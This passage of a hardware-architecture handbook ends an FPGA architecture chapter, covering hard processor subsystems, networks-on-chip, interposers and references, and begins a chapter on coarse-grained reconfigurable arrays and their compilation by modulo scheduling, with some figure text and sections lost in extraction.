Fig. 21 (a) Early Xilinx FPGA with a MicroBlaze soft processor implemented in soft logic, (b)
Xilinx Virtex-II Pro FPGA with 2 hard PowerPC blocks whose peripherals are implemented in
soft logic, (c) Xilinx Zynq Ultrascale+ with a complete hard processor subsystem, and (d) Xilinx
Versal architecture with both a hard scalar processor subsystem and a spatial vector processor array
Altera and Xilinx, respectively. This alleviated the design burden from FPGA users
while still allowing them to flexibly configure their architecture parameters (e.g.,
instruction/data cache sizes, number of cache levels, ALU capabilities, etc.) to
match the application requirements. However, these soft processors are still area-
inefficient, slower, and have limited capabilities (e.g., scalar, single-issue, in-order
microarchitecture) compared to mainstream CPUs, which makes them more suitable
for lightweight control and housekeeping tasks rather than compute-oriented ones.
The gap is even larger compared to direct hardware execution on repetitive tasks.
For example, a Nios II soft processor on a Stratix IV FPGA runs at 250 MHz
and consumes 1130 LUTs, 4 DSPs, and 11 BRAMs. When used to compute a
simple third-degree polynomial, it has 50× less performance, 130× higher energy,
and 2× higher LUT utilization compared to a dedicated hardware implementation
(configured into the FPGA) of the same function. Some studies attempt to optimize
scalar soft processors for more compute-intensive tasks by adding support for vector
instructions. Yiannacouras et al. show that a vector soft processor can improve
performance by 25× over a scalar soft processor; while area increases, the area-
delay product is still 3× better than a scalar soft processor (Yiannacouras et al.
2009).
As more systems incorporated processors for control and less compute-intensive
tasks, FPGA vendors began to harden processor cores to increase performance
vs. soft processors. For example, the Xilinx Virtex-II Pro architecture had up to
2 IBM PowerPC RISC processor blocks as illustrated in Fig. 21b, while Altera
13 Field-Programmable Gate Array Architecture 455
integrated an ARM core in the Apex architecture. These initial efforts hardened
only the raw processor core with primitive wire interfaces to the programmable
fabric, while the rest of the processor subsystem (e.g., memory controller and
peripherals) had to be implemented in the soft logic. This was still time-consuming
and did not show enough efficiency gains compared to soft processors to justify
the higher design effort and reduced configurability; consequently, these hardened
processor-core-only systems were not very successful. With FPGAs growing into
more complex and heterogeneous platforms, complete hard processor subsystems
(i.e., processors along with their key peripherals) have been incorporated in recent
FPGA architectures. This approach has been much more successful as it provides
designers with an easy-to-use software environment for implementing portions
of their applications, while still achieving a significantly higher performance and
energy efficiency compared to soft processors. Consequently, high-performance
full-featured hard processor subsystems are now available in most FPGA families.
For example, Xilinx’s Zynq Ultrascale+ (in Fig. 21c) has an embedded quad-core
ARM Cortex-A53 processor along with a cache coherency unit, a memory man-
agement unit, direct memory access controller, and many different IO peripherals
(e.g., USB, I2 C, UARTs, GPIOs, etc.) to communicate with the outside world, as
well as the tightly coupled FPGA fabric. These hybrid devices can be used in many
applications where the processor handles strictly serial and branching portions of
the workload while the highly-parallel compute-intensive portions are offloaded to
the FPGA – this echoes the initial vision for reconfigurable computer architectures
in the 1960s (Estrin 1960).
The Xilinx Versal architecture integrates not only an FPGA fabric and a tradi-
tional hard processor subsystem, but also a many-core vector processor complex
with bus-based reconfigurable interconnect, as shown in Fig. 21d. This architecture
still has a spatial nature (similar to an FPGA), and combines the software-
level programmability of vector processors with the flexibility of programmable
interconnects, making processor cores essentially another form of logic blocks
in reconfigurable devices. This new architecture is initially targeted at 5G signal
processing and AI, two large and compute-intensive markets for FPGAs. New tools
for architecture exploration and evaluation of these highly heterogeneous devices
are also emerging (Boutros et al. 2022), enabling new research into both their
programming models and efficiency in various applications.
As FPGAs have grown in both capacity and IO speed, distributing ever higher
bandwidth data streams throughout an ever larger fabric has become challenging.
Traditionally the system-level interconnect that connects high-speed IO interfaces
such as DDR, PCIe and Ethernet to modules implemented in the FPGA fabric has
been implemented as soft buses. These soft buses include multiplexing, arbitration,
pipelining and wiring between the relevant endpoints. As the data bandwidth of
external IO interfaces has increased, these soft buses have been forced to become
456 A. Boutros and V. Betz
very wide to carry the larger data streams, increasing their resource utilization and
making timing closure harder. For example, a single channel of high-bandwidth
memory (HBM) has a 128-bit double data rate interface operating at 1 GHz,
so a bandwidth-matched soft bus running at 250 MHz must be 1024 bits wide.
With recent FPGAs incorporating up to 8 HBM channels as well as numerous
PCIe, Ethernet and other interfaces, system level interconnect can rapidly use
a major fraction of the FPGA logic and routing resources. In addition, system-
level interconnect tends to span long distances. The combination of very wide and
physically long buses makes timing closure challenging and usually requires deep
pipelining of the soft bus, further increasing its resource use. The system-level
interconnect challenge is becoming more difficult in advanced process nodes, as
the number and speed of FPGA external interfaces increases, and the metal wire
parasitics (and thus interconnect delay) scales poorly (Bohr 1995).
Abdelfattah and Betz (2013) proposed embedding a hard, packet-switched
network-on-chip (NoC) in the FPGA fabric to enable more efficient and easier-
to-use system-level interconnect. Although a full-featured packet-switched NoC
could be implemented using the soft logic and routing of an FPGA, an NoC with
hardened routers and links is 23× more area efficient, 6× faster, and consumes
11× less power compared to a soft NoC. Designing a hard NoC for an FPGA is
challenging since the FPGA architect must commit many choices to silicon (e.g.,
number of routers, link width, NoC topology) yet still maintain the flexibility of an
FPGA to implement a wide variety of applications using many different external
interfaces and communication endpoints. Work in Abdelfattah and Betz (2013)
advocates for a mesh topology with a moderate number of routers (e.g., 16) and
fairly wide (128-bit) links; these choices keep the area cost to less than 2% of
the FPGA while ensuring the NoC is easier to lay out and a single NoC link can
carry the entire bandwidth of a DDR channel. A hard NoC must also be able
to flexibly connect to user logic implemented in the FPGA fabric. Abdelfattah
et al. (2015) introduced the fabric port which interfaces the hard NoC routers to
the FPGA programmable fabric by performing width adaptation, clock domain
crossing and voltage translation. This decouples the NoC from the FPGA fabric
such that the NoC can run at a fixed (high) frequency, and still interface to FPGA
logic and IO interfaces of different speeds and bandwidth requirements with very
little glue logic. Hard NoCs also appear very well suited to FPGAs in datacenters.
Datacenter FPGAs are normally configured in two parts: a shell provides system-
level interconnect to the external interfaces, and a role implements the application
acceleration functionality (Caulfield et al. 2016). The resource use of the shell can
be significant: it requires 23% of the device resources in the first generation of
Microsoft’s Catapult systems (Putnam et al. 2014). Yazdanshenas and Betz (2018)
showed that a hard NoC significantly improves resource utilization, operating
frequency and routing congestion in datacenter FPGAs. Other studies have proposed
FPGA-specific optimizations to increase the area efficiency and performance of soft
NoCs (Kapre and Gray 2017; Papamichael and Hoe 2012). However, Yazdanshenas
and Betz (2018) showed that even optimized soft NoCs still trail hard NoCs in usable
bandwidth, latency, area and routing congestion.
13 Field-Programmable Gate Array Architecture 457
a b
Specialized Engines Transceivers
Memory Controllers
Memory Controllers
NoC NoC
Transceivers
Row Column
Routers
Subsystem
Processor
Peripheral
Links Ring NoC
Memory Controllers & High-Speed IOs Security & Config. Mem. Controllers
Fig. 22 Network-on-Chip system-level interconnect in next-generation (a) Xilinx Versal and (b)
Achronix Speedster7t architectures
Recent Xilinx Versal and Achronix Speedster7t FPGAs integrate a hard NoC
similar to the academic proposals discussed above. Versal uses a hard NoC
for system-level communication between various endpoints (Gigabit transceivers,
processor, AI subsystems, soft fabric), and is in fact the only way for external
memory interfaces to communicate with the rest of the device (Swarbrick et al.
2019). It uses 128-bit wide links running at 1 GHz, matching a DDR channel’s
bandwidth. Its topology is related to a mesh, but with all horizontal links pushed
to the top and bottom of the device to make it easier to lay out within the FPGA
floorplan. The Versal NoC contains multiple rows (i.e., chains of links and routers)
at the top and bottom of the device, and a number of vertical NoC columns (similar
to any other hard block columns such as DSPs) depending on the device size as
shown in Fig. 22a. The NoC has programmable routing tables that are configured at
boot time and provides standard AXI interfaces as its fabric ports. The Speedster7t
NoC topology is optimized for external interface to fabric transfers. It consists of
a peripheral ring around the fabric with NoC rows and columns at regular intervals
over the FPGA fabric as shown in Fig. 22b. The peripheral ring NoC can operate
independently without configuring the FPGA fabric to route the traffic between
different external interfaces. There is no direct connectivity between the NoC rows
and columns; the packets from a master block connecting to a NoC row will pass
through the peripheral ring to reach a slave block connected to a NoC column.
Interposers
FPGAs have been early adopters of interposer technology that allows dense
interconnection of multiple silicon dice. As shown in Fig. 23a, a passive interposer is
a silicon die (often in a trailing process technology to reduce cost) with conventional
metal layers forming routing tracks and thousands of microbumps on its surface
458 A. Boutros and V. Betz
Package Substrate
b Transceiver
Microbumps Chiplets
TX FPGA TX
Interposers
Package Substrate
that connect to two or more dice flipped on top of it. One motivation for interposer-
based FPGAs is achieving higher logic capacity at a reasonable cost. Both high-end
systems and emulation platforms to validate ASIC designs before fabrication
demand FPGAs with high logic capacity. However, large monolithic (i.e., single-
silicon-die) devices have poor yield, especially early in the lifetime of a process
technology (exactly when the FPGA is state-of-the-art). Combining multiple smaller
dice on a silicon interposer is an alternative approach that can have higher yield. A
second motivation for 2.5D systems is to enable integration of different specialized
chiplets (possibly using different process technologies) into a single system. This
approach is also attractive for FPGAs as the fabric’s programmability can bridge
disparate chiplet functionality and interface protocols.
Xilinx’s largest devices starting from the Virtex-7 (28 nm) generation use passive
silicon interposers to integrate three or four FPGA dice that each form a portion
of the FPGA’s rows. The largest interposer-based devices provide more than twice
the logic elements of the largest monolithic FPGAs at the same process node.
The FPGA programmable routing requires a large amount of interconnect, raising
the question of whether the interposer microbumps (which are much larger and
slower than conventional routing tracks) will limit the routability of the system.
For example, in Virtex-7 interposer-based FPGAs, only 23% of the vertical routing
tracks cross between dice through the interposer (Nasiri et al. 2015), with an
estimated additional delay of ∼1 ns (Chaware et al. 2012). The study in Nasiri et al.
(2015) showed that CAD tools that place the FPGA logic to minimize crossing of
13 Field-Programmable Gate Array Architecture 459
an interposer boundary combined with architecture changes that increase the switch
flexibility to the interposer-crossing tracks can largely mitigate the impact of this
reduced signal count. The entire vertical bandwidth of the NoC in the Xilinx Ver-
sal architecture (discussed in the “System-Level Interconnect: Network-on-Chip”
section) crosses between dice, helping to provide more interconnect bandwidth.
An embedded NoC makes good use of the limited number of wires that can cross
an interposer, as it runs its links at a high frequency and they can be shared by
different communication streams as they are packet-switched. Xilinx has also used
their interposer technology for heterogeneous integration by incorporating HBM,
starting with their 16 nm Virtex Ultrascale+ generation.
Intel FPGAs instead use smaller interposers called embedded multi-die inter-
connect bridges (EMIB) carved into the package substrate as shown in Fig. 23b.
Intel Stratix 10 devices use EMIB to integrate a large FPGA fabric die with smaller
IO transceiver or HBM chiplets in the same package, decoupling the design and
process technology choices of these two crucial elements of an FPGA. Some recent
studies (Nurvitadhi et al. 2018, 2019) used EMIB technology to tightly couple an
FPGA fabric with specialized ASIC accelerator chiplets for DL applications. This
approach offloads specific kernels of the computation (e.g., matrix-matrix or matrix-
vector multiplications) to the more efficient specialized chiplets, while leveraging
the FPGA fabric to interface to the outside world and to implement rapidly changing
DL model components.
An FPGA’s configuration circuitry loads the bitstream into the millions of SRAM
cells that control the LUTs, routing switches and configuration bits in hard blocks.
On power up, a configuration controller loads this bitstream serially from a source
such as on-board flash. When a sufficient group of configuration bits are buffered,
they are written in parallel to a group of configuration SRAM cells, in a manner
similar to writing a (very wide) word to an SRAM array. This configuration circuitry
can also be accessed by the FPGA fabric and embedded processor subsystems,
allowing partial reconfiguration of one part of the device while another portion
continues processing. For high-reliability applications, this configuration circuitry
can also be used to continuously read back the programmed configuration of the
device and compute a cyclic redundancy check (CRC) in order to detect if any
configuration SRAM cells have been upset by soft errors (such as those induced
by high energy radiation).
A complete FPGA application is very valuable intellectual property, and without
security measures it could be cloned simply by copying the programming bitstream.
To avoid this, FPGA CAD tools can optionally encrypt a bitstream, and FPGA
devices can have a private decryption key programmed in by the manufacturer to
be used by the configuration controller, making a bitstream usable only by a single
customer who purchases FPGAs with the proper key.
460 A. Boutros and V. Betz
Conclusion
FPGAs have evolved from simple arrays of programmable logic blocks and IOs
interconnected via programmable routing into complex multi-die systems with
many different embedded components such as BRAMs, DSPs, high-speed external
interfaces, and system-level NoCs. The recent adoption of FPGAs in the HPC and
datacenter domains, along with the emergence of new high-demand applications
such as deep learning, is ushering in a new phase of FPGA architecture design.
These new applications and the multi-user paradigm of the datacenter create
opportunities for architectural innovation. At the same time, process technology
scaling is changing in fundamental ways. Wire delay is scaling poorly which
motivates rethinking programmable routing architecture. Interposers and 3D inte-
gration enable entirely new types of heterogeneous systems. Controlling power
consumption is an overriding concern, and is likely to lead to FPGAs with more
power-gating and more heterogeneous hard blocks. We do not claim to predict the
future of FPGA architecture, except that it will be interesting and different from
today!
References
Abdelfattah MS, Betz V (2013) The case for embedded networks on chip on field-programmable
gate arrays. IEEE Micro 34(1):80–89
Abdelfattah MS et al (2015) Take the highway: design for embedded NoCs on FPGAs. In:
ACM/SIGDA International Symposium on Field-Programmable Gate Arrays (FPGA), pp 98–
107
Ahmed E, Rose J (2004) The effect of LUT and cluster size on deep-submicron FPGA performance
and density. IEEE Trans Very Large Scale Integr (VLSI) Syst 12(3):288–298
Ahmed I et al (2019) FRoC 2.0: automatic BRAM and logic testing to enable dynamic voltage
scaling for FPGA applications. ACM Trans Reconfig Technol Syst (TRETS) 12(4):1–28
Betz V, Rose J (1998) How much logic should go in an FPGA logic block? IEEE Des Test Comput
15(1):10–15
Betz V, Rose J (1999) FPGA routing architecture: segmentation and buffering to optimize speed
and density. In: ACM International Symposium on FPGAs, pp 59–68
Betz V et al (1999) Architecture and CAD for deep-submicron FPGAs. Springer Science &
Business Media. New York, USA
Bohr MT (1995) Interconnect scaling – the real limiter to high performance ULSI. In: Proceedings
of International Electron Devices Meeting. IEEE, pp 241–244
Boutros A et al(2018) You cannot improve what you do not measure: FPGA vs. ASIC efficiency
gaps for convolutional neural network inference. ACM Trans Reconfig Technol Syst (TRETS)
11(3):1–23
Boutros A et al (2018) Embracing diversity: enhanced DSP blocks for low-precision deep learning
on FPGAs. In: IEEE International Conference on Field Programmable Logic and Applications
(FPL), pp 35–357
Boutros A et al (2020) Beyond peak performance: comparing the real performance of AI-optimized
FPGAs and GPUs. In: IEEE International Conference on Field-Programmable Technology
(FPT), pp 10–19
Boutros A et al (2022) Architecture and application co-design for beyond-FPGA reconfigurable
acceleration devices. IEEE Access 10:95067–95082
13 Field-Programmable Gate Array Architecture 461
Rasoulinezhad S et al (2020) LUXOR: an FPGA logic cell architecture for efficient compressor
tree implementations. In: ACM/SIGDA International Symposium on Field-Programmable Gate
Arrays (FPGA), pp 161–171
Rettkowski J et al (2017) HW/SW co-design of the HOG algorithm on a xilinx zynq SoC. J Parallel
Distrib Comput 109:50–62
Ronak B, Fahmy SA (2015a) Mapping for maximum performance on FPGA DSP blocks. IEEE
Trans Comput-Aided Design Integr Circuits Syst 35(4):573–585
Ronak B, Fahmy SA (2015b) Minimizing DSP block usage through multi-pumping. In: Interna-
tional Conference on Field Programmable Technology (FPT)
Sivaswamy S et al (2005) HARP: hard-wired routing pattern FPGAs. In: International Symposium
on Field-Programmable Gate Arrays (FPGA)
Swarbrick I et al Network-on-chip programmable platform in versal ACAP architecture. In:
ACM/SIGDA International Symposium on Field-Programmable Gate Arrays (FPGA), pp 212–
221
Tang X et al (2019) A study on switch block patterns for tileable FPGA routing architectures. In:
IEEE International Conference on Field-Programmable Technology (FPT), pp 247–250
Tatsumura K et al (2016) High density, low energy, magnetic tunnel junction based block RAMs for
memory-rich FPGAs. In: IEEE International Conference on Field-Programmable Technology
(FPT), pp 4–11
Tessier R et al (2007) Power-efficient RAM mapping algorithms for FPGA embedded memory
blocks. IEEE Trans Comput-Aided Des Integr Circuits Syst 26(2):278–290
Turakhia Y et al (2018) Darwin: a genomics co-processor provides up to 15,000x acceleration on
long read assembly. ACM SIGPLAN Not 53(2):199–213
Tyhach J et al (2004) A 90 nm FPGA I/O buffer design with 1.6 Gbps data rate for source-
synchronous system and 300 MHz clock rate for external memory interface. In: IEEE Custom
Integrated Circuits Conference, pp 431–434
Upadhyaya P et al (2016) A fully-adaptive wideband 0.5–32.75 Gb/s FPGA transceiver in 16 nm
FinFET CMOS technology. In: IEEE Symposium on VLSI Circuits, pp 1–2
Wang E et al (2019) Deep neural network approximation for custom hardware: where we’ve been,
where we’re going. ACM Comput Surv (CSUR) 52(2):1–39
Wilton S et al (1995) Architecture of centralized field-configurable memory. In: ACM International
Symposium on Field-Programmable Gate Arrays (FPGA), pp 97–103
Wong H et al (2011) Comparing FPGA vs. custom cmos and the impact on processor microar-
chitecture. In: ACM/SIGDA International Symposium on Field-Programmable Gate Arrays
(FPGA), pp 5–14
Yazdanshenas S, Betz V (2018) Interconnect solutions for virtualized field-programmable gate
arrays. IEEE Access 6:10497–10507
Yazdanshenas S, Betz v (2019) COFFE 2: automatic modelling and optimization of complex and
heterogeneous FPGA Architectures. ACM Trans Reconfig Technol Syst (TRETS), 12(1):1–27
Yazdanshenas S et al (2017) Don’t forget the memory: automatic block RAM modelling,
optimization, and architecture exploration. In: ACM/SIGDA International Symposium on Field-
Programmable Gate Arrays (FPGA), pp 115–124
Yiannacouras P et al (2009) Data parallel FPGA workloads: software versus hardware. In: IEEE
International Conference on Field-Programmable Logic and Applications (FPL), pp 51–58
Young-Schultz T et al (2020) Using openCL to enable software-like development of an FPGA-
accelerated biophotonic cancer treatment simulator. In: ACM/SIGDA International Symposium
on Field-Programmable Gate Arrays (FPGA), pp 86–96
Zgheib G et al (2014) Revisiting and-inverter cones. In: ACM/SIGDA International Symposium
on Field-Programmable Gate Arrays (FPGA), pp 45–54
Zhao Z et al (2020) Achieving 100 Gbps intrusion prevention on a single server. In: USENIX
Symposium on Operating Systems Design and Implementation (OSDI), pp 1083–1100
Coarse-Grained Reconfigurable
Array (CGRA) 14
Zhaoying Li, Dhananjaya Wijerathne, and Tulika Mitra
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
Historical Context . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468
Architecture: A Landscape of Modern CGRA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
Compilation for CGRAs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Modulo Scheduling and Modulo Routing Resource Graph (MRRG) . . . . . . . . . . . . . . . . . 475
CGRA Mapping Approaches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 477
Other Compilation-Related Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 492
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 500
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 500
Abstract
with the historical context, sketching the architectural landscape, and providing
an extensive overview of the compilation approaches.
Keywords
Introduction
PE PE PE PE
SWITCH
DATA MEMORY
Config
Mem
PE PE PE PE
RF
FU
OUTPUT
PE PE PE PE
PE PE PE PE
Historical Context
While Moore’s law was responsible for the sustained increase in clock frequency,
the processor performance improved further due to several micro-architectural inno-
vations including processor pipeline, out-of-order execution, speculation, and cache
memory hierarchy among others. These advancements enabled the processor to
extract instruction-level parallelism (ILP), thereby boosting the critical instructions-
per-cycle (IPC) metric (Hennessy and Patterson 2011). More importantly, as the
ILP was extracted transparently by the underlying architecture from single-threaded
programs, the software developers enjoyed the performance benefit without any
additional effort. Together, the growth in clock frequency and IPC ensued the
relentless gain in processor performance spanning over three decades. However,
this performance growth has come to an end with power wall due to the breakdown
of Dennard scaling, ILP wall, and memory wall (Patterson et al. 2006). Thus,
computing systems made the irreversible transition in early 2000 toward multi-
and many-core architectures to gainfully employ the growing number of transistors
supported by Moore’s law and exploit thread-level parallelism (TLP) instead of ILP.
However, simply increasing the core count in multi-cores is no longer tenable as
the sequential fragment limits the speedup of the entire application according to
Amdahl’s law (Amdahl 1967).
Against this backdrop, domain-specific accelerators (Dally et al. 2020; Jouppi
et al. 2017; Ghorpade et al. 2012; Rashid et al. 2019) specialized for a particular
task such as deep neural networks, image/video processing, encryption, etc., have
become prevalent from tiny Internet-of-Things (IoT) devices to the datacenters.
Current system-on-chips (SoCs) include a number of special-purpose accelerators.
Shao et al. (2015) analyzed die photos from three generations of Apple’s SoCs: A6
(iPhone 5), A7 (iPhone 5S), and A8 (iPhone 6) to show that consistently more than
half of the die area is dedicated to application-specific hardware accelerators and
470 Z. Li et al.
et al. 2021), Samsung Reconfigurable Processor (Suh et al. 2012), Renesas Dynam-
ically Reconfigurable Processor (DRP) (Fujii et al. 2018), and Intel Configurable
Spatial Accelerator (Fleming et al. 2020). These CGRAs have more processing
elements and complex architectures compared to the original designs and thus
require more compilation effort to efficiently utilize the hardware resources.
There have been many works on domain-specific spatial accelerators in recent
literature (Chen et al. 2019; Jouppi et al. 2017; Lu et al. 2017; Tu et al. 2017;
Kwong and Chandrakasan 2011; Yoo et al. 2012). These accelerators target
applications in specific domains such as deep neural network, image analysis, and
signal processing. The micro-architecture of domain-specific spatial accelerators
shares many similarities with CGRAs. Like CGRAs, most of the domain-specific
accelerators have an array of processing elements connected in a two-dimensional
grid. However, the processing elements have limited and specific computation
capability. The interconnection network is designed to support specific dataflow
and not fully reconfigurable. For example, in the Google Tensor Processing Unit
(TPU), the processing elements only support multiply and accumulation operations,
while the interconnection network supports systolic dataflow for matrix multipli-
cation (Jouppi et al. 2017). These domain-specific accelerators can be viewed as
different instantiation of domain-agnostic CGRA accelerator that can be configured
in software to support any dataflow and computation.
In this section, we provide a brief overview of the basic CGRA architecture and its
variations. For a detailed survey of the CGRA architectures, the readers can refer
to Liu et al. (2019) and Podobas et al. (2020).
heterogeneous CGRA, the PEs can have different functionalities. If a CGRA targets
application kernels from some specific domains, special PEs can be useful, such as
the ones supporting multiply-accumulate (MAC) operations in machine learning.
However, if these special PEs are costly in terms of area or power, then the CGRA
includes special functionality in only some of the PEs. Most CGRAs provide
heterogeneity in terms of memory access functionality. For example, in the CGRA
of Fig. 1, it is not necessary to let all the PEs access the on-chip data memory. The
latency for data memory access is generally much longer than computation, and the
SPM also has a limited number of ports restricting the number of parallel accesses.
Hence, usually only the PEs at the boundary can access the SPM. Another example
is RAPID architecture (Venkataramani et al. 2019) that has a 1D array of special
function units (SFUs) alongside a 2D array of PEs. The SFU is used to support
FP32 operations, and other PEs can only support integer operations.
Spatial CGRA A CGRA can reconfigure the PEs for different operations and
routing per cycle. Each PE is associated with a configuration memory. The
configuration memory stores a limited number of configuration words, one per
cycle. The PE rotates or loops through these configuration words and accordingly
sets the operation of the FU and the routing for the switches and the RF. A special
case is a CGRA with only one configuration word and is referred to as a spatial
CGRA. A spatial CGRA can reduce area, power, as well as cycle time (higher clock
frequency) as there is no reconfiguration delay involved. The area and power of
the configuration memory are considerable for the CGRAs. In Karunaratne et al.
(2018), the power consumption of a 4 KB configuration memory in a 4 × 4 CGRA is
around 40% of the whole chip power. A spatial CGRA is more energy-efficient than
traditional CGRAs. However, it does not have the advantage of temporal dimension
and essentially reduces to FPGA but with coarse-grained reconfigurable units.
Note that the limited configuration memory, while area- and energy-efficient, may
not be able to accommodate large kernels or need loop partitioning with runtime
configuration reloading to accelerate such kernels.
On-chip network The on-chip network connects the PEs to route data. In each
PE, there are routing paths from the input ports to the output ports. Also, the data
can be stored in the register file while waiting for processing or further routing.
The most common network is neighbor-to-neighbor (N2N) connection. Each PE
is connected to its neighboring PEs, and neighbors can be reached in one cycle.
14 Coarse-Grained Reconfigurable Array (CGRA) 473
Routing to distant PEs requires other intermediate PEs and needs multiple cycles.
The simple N2N network, however, provides very limited interconnection on the
chip. It needs tremendous compilation effort to achieve good speedup in accelerating
kernels with complex data dependencies and even then the speedup can be limited.
Memory hierarchy Typically, the CGRA memory hierarchy consists of two types
of memory: data memory to hold input, output, and intermediate data and the
configuration memory to hold the configuration directives for the FU, RF, and the
switches.
Fig. 4 On-chip memory hierarchy of CGRA loosely coupled with host CPU
Figure 4 shows CGRA data memory with four memory banks where only the
boundary PEs on the left side have access to the data memory. Some architectures
perform the load/store address generation within the PE array, while others have
specialized hardware address generation units (Wijerathne et al. 2019). Apart from
global data memory, some CGRA architectures use shared register files to hold
intermediate data. These register files are shared between a subset of PEs. It provides
an alternative to the on-chip network for communication between those subsets
of PEs.
The CGRA configuration memory, also referred to as context/instruction mem-
ory, holds the directives for CGRA execution each cycle including the operation to
be executed by the PEs and the routing configurations for the crossbars switches.
As CGRAs are specifically used for accelerating loop kernels, the same sequence
of configurations are repeated over a fixed number of cycles. The configurations
are loaded into the configuration memory before the CGRA execution starts. The
configuration memory can be either centralized (global) or decentralized (local),
where each PE has a separate configuration memory. Even in a decentralized setting,
the configurations for the PEs are fetched and decoded in a lockstep manner.
Therefore, program counters of all the PEs have the same value even though they
have different configurations.
Some CGRAs are closely coupled with the main processor, where CGRA is a part
of the main CPU. For example, ADRES (Mei et al. 2003a) CGRA is tightly coupled
with the main processor, where the top row of the PE array is a VLIW processor
14 Coarse-Grained Reconfigurable Array (CGRA) 475
that acts as the main processor. Figure 4 shows a loosely coupled CPU where the
CGRA is connected to an independent accelerator. MorphoSys CGRA (Singh et al.
2000) is an example of a loosely coupled CGRA. Loosely coupled CGRAs offer
more flexibility in the design phase as they can be designed independently. In a
loosely coupled system, both the CPU and the CGRA can execute code in parallel
in a non-blocking manner. A tightly coupled system typically cannot execute code
in parallel on the CPU and the CGRA as they share the same resources. However,
the overheads in data transfer are higher in the loosely coupled system compared to
the tightly coupled system.
Given a loop from an application and a CGRA architecture, the goal of compilation
is to map the loop onto the CGRA (i.e., generate the configurations for a fixed
number of cycles) to maximize the throughput. In general, this compilation is
referred as mapping in the CGRA world. The loop is represented as a dataflow
graph (DFG), where the nodes represent the operations and the edges represent the
dependency between the nodes.
Figure 5c shows a possible mapping of the DFG in Fig. 5b onto the CGRA in
Fig. 5a. For the sake of convenience, the 2 × 2 CGRA in Fig. 5a has been drawn
as a linear array. The mapping has three parts: prologue, steady-state kernel, and
epilogue. The prologue and epilogue are executed only once at the start and end
of the loop execution. The steady-state kernel is repeated and includes all the
operations from one or more iterations. The schedule length of the kernel is called
the initial interval (II) and indicates the number of cycles between the initiation
of consecutive loop iterations. For a loop with a large number of iterations, the
execution time is dominated by the II value.
476 Z. Li et al.
c 1st iteration
PE0 PE1 PE2 PE3 2nd iteration
b 3rd iteration
cycle 0 n1 n2
n1 n2 prologue
cycle 1 n3 n4
cycle 2 n1 n2 n5
n3 n4 steady state
kernel
cycle 3 n3 n4 n6 II = 2
a
n5 cycle 4 n1 n2 n5
PE0 PE1
…
cycle n-1 n5
n6 epilogue
PE3 PE2 cycle n n6
Fig. 5 2×2 CGRA, a DFG (dataflow graph), and the mapping. (a) 2×2 CGRA. (b) DFG example
(c) DFG mapping example
In the mapping of Fig. 5c, II = 2. Notice that node n5 of the first loop iteration is
executing in the same cycle with n1 and n2 from the second-loop iteration. Hence,
the CGRA can start a new loop iteration every two cycles leading to II value of
two. The routing is done through the network among the PEs. This figure shows an
abstract mapping for convenience. A real mapping will include the detailed routing
configuration at each PE.
Given a DFG and a CGRA, the mapper first calculates the minimum initial
interval (MII), which is the maximum of the resource-minimal II and the recurrence-
minimal II. The resource MII depends on the number of PEs and the number of DFG
nodes (assume one PE can process one DFG node). Hence, the resource MII cannot
be less than the number of DFG nodes divided by the number of PEs. The recurrence
MII is determined by the dependency across loop iterations. Let us assume that we
have an operation a[i] = a[i − 1] × b[i]. The operation of iteration i must wait for
the result of the operation of last iteration i−1. The recurrence MII can be calculated
by traversing the DFG.
Mapping a compute-intensive loop kernel of an application to CGRAs using
modulo scheduling was first discussed in the DRESC compiler (Mei et al. 2003b).
The algorithm starts with an II equal to the maximum between the resource-minimal
II and recurrence-minimal II and attempts to schedule the loop. If it fails, it tries with
successively larger II values.
Modulo Routing Resource Graph (MRRG) Mei et al. (2003b) proposed the
MRRG, which represents the resources and the routing for a time-extended CGRA.
The nodes in MRRG represent the ports of the register file, the on-chip network, the
ALU inside PE, etc. The edges are the connections among the CGRA components
represented as nodes. The MRRG is a directed graph GI I where II corresponds to
14 Coarse-Grained Reconfigurable Array (CGRA) 477
the initiation interval. Given a graph G, let us denote the vertex set by V (G) and
the edge set by E(G). Each node v ∈ V (GI I ) is a tuple (n, t), where n refers to the
resource in CGRA and t is the cycle (0 ≤ t ≤ I I − 1). Let e = (u, v) ∈ E(GI I )
be an edge where u = (m, t) and v = (n, t + 1). Then the edge e represents
a connection from resource m in cycle t to resource n in cycle t+1. In general,
if resource m is connected to resource n in the CGRA, then node u = (m, t) is
connected to node v = (n, t + 1), t ≥ 0.
Figure 6 shows the MRRG corresponding to the CGRA in Fig. 5a when the II
is 2. The resources of 2 × 2 CGRA are replicated every cycle along the time axis.
In modulo scheduling, if a node v = (n, t) in the MRRG becomes occupied, then
all the nodes v = (n, t + k × I I ) (where k > 0) are also occupied. For example,
in Fig. 5c, PE0 is occupied by node n1 at cycle 0 and the II is 2. Thus the node will
occupy PE0 every 2 × k cycle. Hence, after cycle 1, the configuration in cycle 0
will be used to reconfigure the fabric, as the II is 2 and configuration has two items.
Thus, there are wrapped around edges from the second item back to the first one, as
cycle 3 will use the first configuration item. These edges show hardware resource
connection along the time axis.
time
Heuristic Approaches
The heuristic approaches propose customized solutions for the CGRA mapping
problem.
Simulated Annealing
Meta-heuristics are problem-independent approaches that treat the architec-
tural elements as black boxes. Simulated annealing is one of the most popular
meta-heuristic methods. Here, we introduce the usage of simulated annealing
in CGRA mapping as proposed in the DRESC compiler (Mei et al. 2003b).
For a target II value, the algorithm first generates an initial schedule satisfying
the dependence constraints but with possibly over-subscribed resources. For
example, more than one operation might be scheduled on the same functional
unit in the same cycle. The algorithm then iteratively reduces resource overuse
and tries to come up with a legal scheduling via simulated annealing that
explores different placement and routing options until a valid placement and
routing of all operations and data dependencies are found. The cost function
used during the simulated annealing is based on the total routing cost, i.e., the
combined resource consumption of all the placed operations and the routed
data dependencies. In this technique, a huge number of possible routes are
